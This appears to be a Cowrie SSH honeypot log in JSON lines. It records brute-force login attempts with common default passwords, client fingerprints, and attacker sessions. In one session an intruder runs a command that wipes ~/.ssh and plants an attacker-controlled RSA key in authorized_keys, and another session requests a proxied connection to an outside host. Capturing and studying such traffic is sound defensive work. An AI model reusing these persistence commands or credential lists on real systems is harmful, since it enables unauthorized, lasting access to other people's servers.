{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:08.961849Z","src_ip":"43.159.36.188","session":"3b6b80e7f206"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:09.979798Z","src_ip":"43.159.36.188","session":"3b6b80e7f206"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:10.225410Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:10.226452Z","src_ip":"43.159.36.188","session":"3b6b80e7f206"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47560,"dst_ip":"1.2.3.4","dst_port":22,"session":"caf1edd8a8ee","protocol":"ssh","message":"New connection: 212.227.235.229:47560 (1.2.3.4:22) [session: caf1edd8a8ee]","sensor":"my-vps","timestamp":"2025-08-31T06:08:10.759195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:10.760075Z","src_ip":"212.227.235.229","session":"caf1edd8a8ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:11.044980Z","src_ip":"212.227.235.229","session":"caf1edd8a8ee"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1qaz2WSX","message":"login attempt [ubuntu/1qaz2WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:12.227176Z","src_ip":"212.227.235.229","session":"caf1edd8a8ee"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:13.513882Z","src_ip":"212.227.235.229","session":"caf1edd8a8ee"}
{"eventid":"cowrie.login.failed","username":"test4","password":"123456","message":"login attempt [test4/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:13.770233Z","src_ip":"212.227.235.229","session":"f2c60c976a41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33783,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4bbd44d3ed8","protocol":"ssh","message":"New connection: 212.227.125.160:33783 (1.2.3.4:22) [session: e4bbd44d3ed8]","sensor":"my-vps","timestamp":"2025-08-31T06:08:13.870367Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:13.871502Z","src_ip":"212.227.125.160","session":"e4bbd44d3ed8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34129,"dst_ip":"1.2.3.4","dst_port":22,"session":"2923a3717be3","protocol":"ssh","message":"New connection: 212.227.125.160:34129 (1.2.3.4:22) [session: 2923a3717be3]","sensor":"my-vps","timestamp":"2025-08-31T06:08:13.984249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:13.984917Z","src_ip":"212.227.125.160","session":"2923a3717be3"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T06:08:14.100068Z","src_ip":"212.227.125.160","session":"2923a3717be3"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:14.446423Z","src_ip":"212.227.125.160","session":"2923a3717be3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T06:08:14.562029Z","session":"2923a3717be3"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:15.474987Z","src_ip":"212.227.235.229","session":"f2c60c976a41"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:15.508313Z","src_ip":"212.227.235.229","session":"5d883e7faa73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45326,"dst_ip":"1.2.3.4","dst_port":22,"session":"db2da4a273a1","protocol":"ssh","message":"New connection: 212.227.235.229:45326 (1.2.3.4:22) [session: db2da4a273a1]","sensor":"my-vps","timestamp":"2025-08-31T06:08:18.685606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:18.686706Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:18.926159Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.login.success","username":"root","password":"Founder@123","message":"login attempt [root/Founder@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:19.923109Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:08:20.423661Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:08:20.424416Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:08:20.425254Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:20.665667Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:08:21.202937Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:08:21.203619Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:08:21.444757Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:21.445640Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.session.closed","duration":"18.8","message":"Connection lost after 18.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:21.538151Z","src_ip":"212.227.235.229","session":"5d883e7faa73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45330,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1086c2a0d26","protocol":"ssh","message":"New connection: 212.227.235.229:45330 (1.2.3.4:22) [session: d1086c2a0d26]","sensor":"my-vps","timestamp":"2025-08-31T06:08:21.665116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:21.665774Z","src_ip":"212.227.235.229","session":"d1086c2a0d26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45186,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ee345c01c20","protocol":"ssh","message":"New connection: 212.227.125.160:45186 (1.2.3.4:22) [session: 1ee345c01c20]","sensor":"my-vps","timestamp":"2025-08-31T06:08:21.794653Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:21.896540Z","src_ip":"212.227.235.229","session":"d1086c2a0d26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41756,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed593f47425a","protocol":"ssh","message":"New connection: 212.227.125.160:41756 (1.2.3.4:22) [session: ed593f47425a]","sensor":"my-vps","timestamp":"2025-08-31T06:08:22.348248Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:22.860280Z","src_ip":"212.227.235.229","session":"d1086c2a0d26"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:24.092909Z","src_ip":"212.227.235.229","session":"d1086c2a0d26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45332,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b973ac152bc","protocol":"ssh","message":"New connection: 212.227.235.229:45332 (1.2.3.4:22) [session: 6b973ac152bc]","sensor":"my-vps","timestamp":"2025-08-31T06:08:24.322585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:24.323572Z","src_ip":"212.227.235.229","session":"6b973ac152bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:24.553840Z","src_ip":"212.227.235.229","session":"6b973ac152bc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:25.515795Z","src_ip":"212.227.235.229","session":"6b973ac152bc"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:25.747604Z","src_ip":"212.227.235.229","session":"6b973ac152bc"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:25.756932Z","src_ip":"212.227.235.229","session":"db2da4a273a1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:27.088741Z","src_ip":"212.227.125.160","session":"ed593f47425a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:08:27.089478Z","src_ip":"212.227.125.160","session":"ed593f47425a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45046,"dst_ip":"1.2.3.4","dst_port":22,"session":"a07856a421bf","protocol":"ssh","message":"New connection: 212.227.125.160:45046 (1.2.3.4:22) [session: a07856a421bf]","sensor":"my-vps","timestamp":"2025-08-31T06:08:28.183594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:28.626942Z","src_ip":"212.227.125.160","session":"a07856a421bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:08:28.628276Z","src_ip":"212.227.125.160","session":"a07856a421bf"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:29.128889Z","src_ip":"212.227.125.160","session":"1ee345c01c20"}
{"eventid":"cowrie.login.failed","username":"test4","password":"123456","message":"login attempt [test4/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:31.267034Z","src_ip":"212.227.125.160","session":"a07856a421bf"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:32.843909Z","src_ip":"212.227.125.160","session":"a07856a421bf"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:36.793257Z","src_ip":"212.227.235.229","session":"822e99e5c69e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46370,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ce8d6413c3a","protocol":"ssh","message":"New connection: 212.227.235.229:46370 (1.2.3.4:22) [session: 3ce8d6413c3a]","sensor":"my-vps","timestamp":"2025-08-31T06:08:41.926493Z"}
